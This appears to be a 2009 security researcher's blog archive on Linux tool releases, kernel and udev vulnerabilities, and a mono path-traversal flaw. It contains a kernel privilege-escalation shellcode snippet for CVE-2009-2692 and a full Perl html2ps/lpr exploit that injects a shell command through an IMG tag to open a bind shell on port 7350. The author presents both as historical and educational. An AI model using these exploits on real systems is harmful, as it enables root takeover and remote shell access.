Wednesday, December 23, 2009

Thoughts on companion worms

I wrote a paper almost a year ago now and since it has been
reviewed by a lot of skilled people including, but not limited
to, anti virus researchers, its time to make it public.

Its about a special kind of worm and vulnerabilities
which are commonly under-hyped like CVE-2008-2383 which
most people would probably only recognize as local, if at all.

You can find the paper here.

Enjoy reading it, if you feel that X-mess is coming :)

This is most likely the last posting for this year, so
I wish you merry X-mas and happy new year. You can find me
at the 26C3 in Berlin this year, if everything goes straight.

Monday, November 30, 2009

Always check return value!

A nice bug inside the FreeBSD runtime linker has been
reported here.

It was good that I hashed my previous exploit
(discovered it some months ago) in my twitter message
from November 5th:

md5 4b1717926ed0d4823622011625fb1824 sha1 6871fd05efbddf7eea4447f7bfdc1c9a45979fe3

Since a public exploit is now available anyway,
I also make my version public and you can check the
hashes

here 


to prove it.


I have a strange feeling that this re-discovery comes now,
since I talked to some people regarding BSD bugs lately.
Nevertheless I know kingcope is a skilled reviewer and
it was not the first time he had BSD as a target.

Sunday, November 15, 2009

Adventures in Heap Cloning

Heap seems to be a magic word. I never got download rates
like this for a paper. Since there was no feedback that
told me that I am completely wrong, I make it
available to a broader public now. A small chapter has been
added: 'Countermeasures'.
The paper is available here.
You probably know that I am not a memory-guy, so do not
expect much more research in this area by me.
I rather really enjoy developing code that hashes
like this:  
sha1: c60a0e1daff22c0d97eb03f509c7135d119d830b
md5: fcb19f8317449ad9f93a12fccb63c650.


Monday, November 2, 2009

xorl blog seems to be up again

A few weeks/months ago I sadly realized that the author
of the xorl blog was quitting his writeups. Now it seems
that he is continuing his activities. Now I have
something nice to read at the beginning of the day.
Although he doesn't speak about vulnerabilities he found
himself, its one of the better security blogs in my opinion.
I really enjoy reading it and like to recommend it to
everyone interested in software trickery.
I want more OpenBSD foo. :)

Friday, October 16, 2009

injectso 32bit x86 port

injectso now supports x86 and x86-64 architecture. make automagically
compiles the correct version.I also added some code cleanups and
error checking as well as the possibility to inject DSO's with relative
pathnames as suggested by a patch I received.

Do not forget to vote (right toolbar:) !

Wednesday, October 14, 2009

New injectso available

I ported injectso to the new glibc (2.5, 2.9 and 2.10 tested).
It now runs on Linux/x86-64 machines. Original  developed
by Shaun Clowes in 2001 for i386 and sparc it showed that
there is a really simple way on current systems to do that.

Wednesday, September 30, 2009

unixdump UNIX-socket sniffer available

Update:
Released new version (0.42) since 0.41 (not avail anymore)
crashes when accessing udmp device afer rmmod.
(The dynamically assigned major number was not updated
for unregistering.) Thanks to myself for reviewing my own
code :)

Ok, its finally avail here.

Do not run it inside an xterm or otherwise its
like sniffing all tcp traffic remotely on a ssh shell.
BTW ssh. Due to my ssh timing/packet-size patch
I've been called a Iran circumvention developer.

Really funny wording. I like to add that to my
resume.
And right in time while typing
they play LOA with Love to let you down.
What do you want more?

Tuesday, September 29, 2009

When const really means const

Who cares about const? Its never enforced anyways!?

Except in Linux kernels built with gcc 4.x (maybe even
before?). If you declare a pointer member const
(the thing it points to, not the pointer itself), like
proto_ops in the socket struct, the pointee will be placed in a
RO location which means you cant redirect socket operation
functions like recvmsg(). You have to make the right PTE
writable in order to redirect the functions.
Rootk^H^H^H^H^HCertain debugging LKMs like my unixdump
require to redirect some functions in order to record
whats sent across sockets. unixdump works like tcpdump
for inet sockets. The version which is available now was
written in 2006 for the 2.6.16 kernel and doesnt work with
recent/current ones (and its dirty and hackish anyways).
Thats why I ported it within the last days to current kernels.
It will be uploaded soon.
The way you can modify const members changed in current kernels;
in fact is is easier than before b/c a new function lookup_address()
is exported and you do not need to walk the PGD down.


Tuesday, September 22, 2009

GCC -fmudflap

Programs compiled with -fmudflap are given protection by GCC
against overflow conditions etc. The GCC then adds a runtime
to track&check operations on arrays etc..
To specify runtime behavior, you can pass various
options via the $MUDFLAP_OPTIONS environment variable.
If we look how the mudflap runtime is
handling these options, we have:

...
case viol_gdb:

snprintf (buf, 128, "gdb --pid=%u", (unsigned) getpid ());
system (buf);
...


Note, that mudflap is made for security reasons. For programs
like network servers or setuid binaries.
I made a bugzilla entry into the GCC bugzilla since this
should be changed somehow :)

Monday, September 21, 2009

Small improvement for inotify

The inotify tool got a small improvement yesterday, so you
can pass -r (recursion) to it. It now also allows you to recursively
watch newly created/modified/deleted/accessed files/dirs
in newly created subdirs of the watched directory.
This already showed me some differences between man versions :)

Monday, September 14, 2009

un-evil code

I had incredible dl statistics for gc.cc (see last posting). Even
better than for exploits, years ago when I was publishing them.
Seems to me I should switch completely to write robust and boring
application code which is much more appreciated by the public.

Nevertheless, since there have not been reports about
crash containing major bugs or alike, I removed the beta-test
password from the directory.




Friday, September 4, 2009

C++ local_scope<> template

If you write a lot of code (and I know, some of the readers
actually do :), depending on your style, you often run
into situations where you allocate some ressource like
fopen()ing some files or allocing memory and later
you realize some error-condition and you properly need
to fclose()/free() all the stuff in the right order
and depending on what was allocated yet.
This leads to a lot of copy-n-paste code and often
plain wrong code or even better security breaches :)

If you like C++, you can have a look here to avoid
all these problems.

You can register FILE pointers, file-descriptors or
memory regions to a local_scope<> template and it
automatically closes/releases ressources when you leave scope
(also in right order).It is as easy as

local_scope<int> fd(open("/tmp/x2", O_RDONLY), close);

and you can use fd afterwards like you'd normally use
your descriptor. If you need to return due to some
other error condition, the file is closed when the
scope is left.Other ressources like lock's etc could easily
be added by extending local_scope<>.


Friday, August 28, 2009

rewrote Port Shell Crypter

I rewrote PSC, a tool to upgrade plaintext and/or
sessions without a tty across networks (even via
multiple hops) to a full crypted pty based session.

It works by doing the handshake and crypto across
the terminal layer instead of using network calls. The whole
code does not need any networking functionality.
If you have a chained session from host A to D like
A -> B -> C -> D and before starting the session you start your
local psc tool on host A and as soon as on host D you start
the other endpoint, the full chain is encrypted and nobody
on B and C can see or modify what you are typing.
Evil administrators on intermediate hosts (B, C) might use
ptrace() or whatever to even sniff SSH sessions. Using psc,
this is not possible anymore.

First, I wanted to make some video (since it seems very hip
these days :) showing how a old gitweb exploit makes a full
pty crypto shell using psc so you could use 'mc' etc.
on it at the end. However, xvidcap has some lib requirements
which I cant give it on my machine yet without hours
of recompilation and so I thought I do the release old-school. :)



Friday, August 21, 2009

CRypted Administration SHell beta available

You can download crash here.

I started this project during last hackweek in July 09 and
now found some time to finish it.
Login/password is cr4sh/cr4sh. If you have any major problems
please let me know, otherwise the release will be made
available to a broader audience.
crash has not yet been tested on slow/hanging networks
and I'd be interested in feedback whether the chunksizes
still do etc.

Saturday, August 15, 2009

CVE-2009-2692 and android; mitigation

Update:{ it seems like someone else have had more time than me
checking out the CVE-2009-2692 vulnerability and the -EINVAL
vs. -EPERM issue on android. As already stated below, one
should check the ELF loader and how it handles PT_LOAD
segments of 0-addr.And, it seems that it did the trick!
At least from reading their exploit.
I didnt test it but it looks good to me.}

I made up a reliable exploit for CVE-2009-2692 myself with a generic
kernel 2.6 x86-64 shellcode which has only a small stub in
asm and does the rest in C.
It works reliable across the various kernel versions and I hoped to pwn my android with it, but unfortunately it turned out that the running 2.6.27 kernel inside has proper mmap_min_addr set to 0x1000 so this bug is out of the game. There is no suid for a
PERSONALITY_SVR4 preload either. The thing that makes me
wonder is, that it returns -EINVAL instead of the common -EPERM,
so maybe some further research is required.
Maybe linking the ELF binary's PT_LOAD segment to 0 helps :)

The funny thing is that a lot "
CVE-2009-2692 exploit" queries
from search engines point to this site and the crowd seem to have problems finding spender's wunderbar_emporium.tgz :-)


If you are looking for easy mitigation of the attack
on openSUSE systems, call

echo 0x1000 > /proc/sys/vm/mmap_min_addr

from a rootshell. Since there is no setuid pulseaudio or
SELinux installed on openSUSE, this kills any NULL ptr attacks.

Friday, August 14, 2009

A .note on CVE-2009-2692

I recommend reading this posting.

I am usually not commenting on other ppl's bug-findings. 100% of the fame and honor should
go to Tavis Ormandy and Julien Tinnes. If spenders exploit is doing too much magic for you,
heres the simple code snippet, which, if mapped at 0x0 gives you root:

// threadinfo = $0xffffffffffffe000 & %rsp
// task_struct offsets: current->parent = 696 current->uid = 1080
void do_root_2_6_27_x8664()
{
__asm__(""
"xor %rax,%rax\n"
"mov $0xffffffffffffe000,%rax\n" /* find threadinfo */
"and %rsp,%rax\n"
"mov (%rax),%rax\n" /* threadinfo->task */
"mov 696(%rax),%rax\n" /* task->parent */
"movl $0,1080(%rax)\n" /* task->uid = 0 */
"movl $0,1084(%rax)\n" /* task->euid = 0 */
"movl $0,1088(%rax)\n" /* task->suid = 0 */
"movl $0,1092(%rax)\n" /* task->fsuid = 0 */
"movl $0,1096(%rax)\n" /* task->gid = 0 */
"movl $0,1100(%rax)\n" /* task->egid = 0 */
"leaveq\n");
}

It doesn't disable SELinux or so, its just for understanding that for simple rootshell you only
need to give the parent of the exploit (which is usually the shell that started the exploit)
UID/EUID of 0. The code is a modification of shellcode I used in a bluetooth kernel
PoC exploit 4 years or so ago.The code will cause a segfault
to the current process which does not matter since we
only care about the parent shell which obtains its root privs.

So, how much magic is there with the exploit?

Greetings to the people at HAR, I am sad I cannot attend this time :(

Thursday, July 30, 2009

pwned

Today I proudly realized, while viewing Referer logs, I
have been nominated for the Best Privilege Escalation
Bug in the pwnie-awards for discovering and exploiting

CVE-2009-1185 (udev). The story behind that is that
I was frustrated to have no root-sex within the last
6 months or so (since postfix) and therefore
I started reviewing the glibc ELF loader for such which lead me
somehow to certain daemons such as nscd followed by
hald and finally udevd. I quickly realized that it missed
important checks but the impact was unknown to me since
it kindly denied my exploitation offers until I found my way in.

You might be surprised to hear that I am not really
a security guy and used to stay away from sec-con events,
even though I work in that field.
I rather see myself as a programmer with interest in coding
and reading other peoples code and its often funny to
watch and follow discussions by the "security professionals".

The thing that makes me actually commenting on this is the
nice coincide with the nomination of my hero Solar Designer. :)



Wednesday, July 29, 2009

unreadable comments

Its possible that its just spam, but I receive a lot
of chinese/japanese or whatever comments to my postings.
Since I wont approve what I dont understand, I cannot
approve these. So, please comment either in deutsch
or in english.

Sunday, July 19, 2009

A .note on local root exploits

There happened a lot of weird things and discussions
during the last week. Not only a silly kernel/gcc
combination attack was published by my favorite VJ;
also a second issue was released by the google sec-team,
which unfortunally was inside the same program that spender
used as an attack vector in one of the videos.

At the end, its nice that there are (thanks god, I am not
alone in this world!) people who seem to like/care
about local root exploits. You should definitely
have a look at Julien's blog (pulseuadio as well
as the mmap_min_addr postings).I feel like _uh,ohhh_
that theres actually some people doing real things
beside all the web 2.o, XSS and similar sillyness.

As you might know (or not, who cares :) I like local
root exploits. Every now and then I try to find some,
and sometimes I am even successful. Not only two times
so far, as some blogs try to suggest. :-)
Surprinsingly it is not much harder than 10 years ago,
if we do not count overflow/memory corruption bugs.
The bugs just get more silly and most of the time they
require a combination of multiple minor flaws. But
thats exactly what makes the beauty of local root exploits.

Some people do not honour them. They argue that only
remote exploits are of interest. But these people probably
never run a cluster or one of the top500's or found themself
removing ssh backdoors on a weekend instead of having fun.

A local vulnerability deservs the same update urgency
as remote ones.




Tuesday, May 5, 2009

Do not follow me on twitter

I just grabbed a login on twitter but I am probably
not going to publish something there. Its just
a place holder.

I reviewed a lot of messaging code (hal, upstart etc.) during the last few weeks
as a post-handling of the udev issue. I learned a lot and
thats great, but no new interesting issues so far.




Saturday, April 18, 2009

New WWW censorship (f)laws in .de

I am usually not into politics, but today its necessary and I
hope I am not forced too often to write such statements.
Its about the german government introducing censorship
into the WWW while big companies spy on their employees.
Instead of bringing law to the people, flaw is brought to
the people.

Das Ministerium für Gedöhns (O-Ton Ex-Bukasch) hat es geschafft
die deutschen Internetprovider zu Leymen. Brav unterzeichnen sie
in der Majorität Knebelverträge mit dem BKA (Quelle Wikileaks).
Komisch wie schnell soetwas geht, während Datenskandalen
und Misswirtschaft anscheinend nicht beizukommen ist.
Es ist wohl alles nur eine Frage des richtigen Leyms.
Nach bekanntem Muster werden mal wieder eine handvoll Perversitäten
oder Terroristen als Anlass genommen den Bürger noch
ein Stück mehr zu gängeln.

Mich würde rein technisch interessieren wieviel Latenz bereits
jetzt durch genannte Sperren, Filter, Bundestrojaner,
Vorratsdatenspeicherung, Legal-Interception Implementierungen usw.
verloren geht. Wahrscheinlich ruft mich die T deshalb drei
mal die Woche an, ob ich nicht auf VDSL upgraden möchte.




Thursday, April 16, 2009

udev trickery (CVE-2009-1185 and CVE-2009-1186)




While the security industry is making weird statements about
no-more-free-hugs and
OSX vs. Windows exploitation fun,
I add my two cents on UNIX exploitation.


There have been two problems in all currently running udevd's
which are shipped on
all major Linux distributions. Even if you
install
selinux or other hardening mechanisms, you are at risk
(please see above screenshot on a targeted selinux config).

The first problem (CVE-2009-1185) appears since the origin of
KOBJECT_UEVENT
messages are not verified, so any user can spoof
messages that udevd takes
as granted from kernel. This allows
some trickery to create a device named
/dev/random with permission
0666 but major and minor number of your
root blockdevice. The rest
is code. Alternatively, CVE-2009-1186 could be exploited
which is a standard stack buffer overflow. Depending on the
configuration of the system
CVE-2009-1185 can also be exploited
with weird network interface-names and
alike so at the end,
chrooted/jailed or PrivSep'ed users have good chance to get a full rootshell.

Tuesday, March 24, 2009

sharpen your .NET skills



I have had dozens of discussions about C#; being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmers code is correct.
The runtime might be buggy as well! I recently read an
article in the famous german iX magazine about security measurements
in .NET. One of the measures is the so called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example-server:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {

private static void store(string key, Byte[] b)
{
try {
Console.WriteLine("Isolated storage @ {0}", key);
IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
fs.Write(b, 0, b.Length);
fs.Close();
} catch {
Console.WriteLine("Exception!");
}
}

private static Byte[] load(string key)
{
Byte[] b = new Byte[256];
try {
Console.WriteLine("IsolatedStorage load @ {0}", key);
IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
fs.Read(b, 0, b.Length);
fs.Close();
} catch {
Console.WriteLine("Exception!");
}
return b;
}
public static void Main()
{
Byte[] buf = new Byte[256];
int cnt;

string data = "";

ASCIIEncoding ascii = new ASCIIEncoding();
TcpListener l = new TcpListener(8080);
l.Start();
try {
Socket s = l.AcceptSocket();
while (data.Trim() != "quit") {
Array.Clear(buf, 0, buf.Length);
if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
break;
data = ascii.GetString(buf, 0, cnt);
Console.WriteLine("Received: {0}", data.Trim());
if (data.StartsWith("store ")) {
Array.Clear(buf, 0, buf.Length);
if (s.Receive(buf, buf.Length, 0) == 0)
break;
store(data.Substring(6, data.Length - 6).Trim(), buf);
} else if (data.StartsWith("load ")) {
Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
s.Send(result);
}
}
} catch {
Console.WriteLine("Exception!");
}
l.Stop();
}
}

You can connect to the server on TCP port 8080 and
store/load data via the telnet interface for example.
Beside the easy of code and the fact that it treats
TCP streams like messages which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as it
should. So, depending on your configuration you can
obtain funny results. On a openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/[some-hash]/.
An attacking scenario is inside the xterm.
I already informed the maintainers and a fix is underway.
Its not a big issue, and I dont have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.

File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.
Additionally, the managed runtime may provide
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.



Friday, March 20, 2009

PcapSharp updated

You can find a new pcap# version of my mono pcap binding
on my website. Its better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the
pcap# dump-files with
tcpdump and wireshark. I am not an expert for Marshalling
C# types to plain C types, but I think I got it right :-)

Tuesday, March 10, 2009

Some news



This post satisfies two needs (except publishing code at all):


First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of me for historical, technical
and educational purposes. A recent law-case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themself etc..
It is illegal to publish such code in order to commit a crime
which is clearly and obviosuly not what I am doing.

The code is that old (2002), that there should rarely be any box at all
which still ships the vulnerable print-filter that is exploited
here. So, except for teaching something this code is useless.
The interesting thing about this piece is that the printfilter didnt
accept spaces in the IMG-tag. But read yourself:

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)


sub usage
{
print "\n$0 <printhost> <remote-host>\n".
"\tprinthost -- name of printer in /etc/printcap\n".
"\tremote-host -- IP or hostname of host where shell appears\n".
"'$0 lp 127.0.0.1' is recommended for everyones own machine\n\n";
exit;
}


my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

if (fork() == 0) {
exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);

Friday, February 6, 2009

James Bond seriously wounded in action


I am impressed. The readers of this little blog still seem to be what they learned as a kid on foreign
Sun's. Guerilla :-) No comment on my postings, never, or at least very rarely. But, its really read!
The last posting produced > 700 hits in less than 2 days to the perl code morphing example.
Without actually really announcing it somewhere at big places.
Cleaned from accesses of the google-bot etc there is still ~ 700 hits. Thats great!
So, I will continue. From time to time :-)

As a thank-you I will post a picture I took at a car park on one of my walks through the city together with
a good friend of mine. We used to take large walks of about 3h or so mostly in urban places,
dumpster-dive or attend on closed conferences or events where we were never invited at, shaking hands
with some big NATO generals for example. Its just a matter of who you say you are.

Wednesday, February 4, 2009

$_='print"\$_=\47$_\47;eval"';eval

If you enjoy self-generating, self-replicating or self-modifying code as much as me,
you can have a look here. The exponential more-perl engine is probably
never executed in the 5th generation, except you have plenty of RAM
and CPU power (e.g. you work for google:).
All samples you can download execute the same code at the end, even though
they need to un-nest and reorder the instructions until original code,
including comments, is reached.

Wednesday, January 28, 2009

IPv6 NAT

During my last ITO project I worked on a solution to implement some kind of NAT
for IPv6. Packet-mangling solutions such as netfilter are missing IPv6 NAT for a good
reason: One of IPv6' design goals was the end-to-end principle and NAT often puts
people in the wrong feeling of security. NAT is one major reason why VoIP-breakhrough
came so late.
However, transparent proxying and redirection of connections is also done via NAT,
and thats where NAT for IPv6 makes sense: to setup SPAM-traps, transparent
virii-scanning or HTTP proxies. My solution works on Linux kernels >= 2.6.14,
running as a normal user-space daemon.

Wednesday, January 7, 2009

Happy new 2009!

Recent 25c3 was a funny event, although I missed a couple of friends to talk to.

So, I could use some time-slots to talk to the OpenBSD folks about security,
which is always funny. Beside our differences about the meaning of exploitability,
they nevertheless do a good job and I highly respect their voluntary work, in
particular in a $$-driven (security-)world. Even on such event, about 2/3 of
the folks only talk about $$ and what kind of customer is waiting for new
'solutions'.
Thanks to the french telco guys for the free beer and the funny stories.